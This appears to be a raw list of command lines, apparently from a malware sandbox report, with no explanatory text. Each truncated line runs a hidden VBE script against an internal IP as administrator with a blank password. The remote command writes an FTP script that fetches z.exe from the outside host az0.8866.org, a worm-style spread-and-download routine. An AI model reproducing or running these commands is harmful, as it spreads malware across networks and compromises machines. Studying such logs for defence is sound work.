  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.104 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.105 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.106 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.107 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.108 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.109 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.110 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.111 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.112 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.113 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.114 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.115 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.116 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.117 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.118 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.119 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.120 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.97 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.121 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.96 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.94 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.71 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.72 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.73 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.74 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.75 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.76 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.77 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.78 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.79 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.80 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.81 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.83 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.82 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.85 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.84 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.86 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.87 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.89 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.88 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.90 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.92 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.91 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.93 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.95 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.150 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.175 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.124 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.152 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.153 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.154 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.156 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.155 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.157 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.158 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.159 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.160 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.161 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.162 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.163 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.164 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.165 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.167 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.166 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.168 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.169 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.170 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.171 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.172 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.173 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.174 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.151 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.70 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.149 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.148 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.125 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.126 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.127 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.128 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.129 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.130 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.131 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.132 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.133 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.134 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.135 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.136 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.137 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.138 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.139 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.140 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.141 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.142 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.143 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.144 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.145 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.146 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.147 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.122 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
